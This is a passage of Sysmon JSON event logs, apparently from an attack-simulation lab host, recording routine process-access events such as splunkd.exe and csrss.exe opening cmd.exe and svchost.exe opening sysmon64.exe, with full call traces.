06:49:19.911","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010A9F90300}","TargetProcessId":"3876","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010A9F90300}\r\nTargetProcessId: 3876\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010A9F90300}","TargetProcessId":"3876","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windo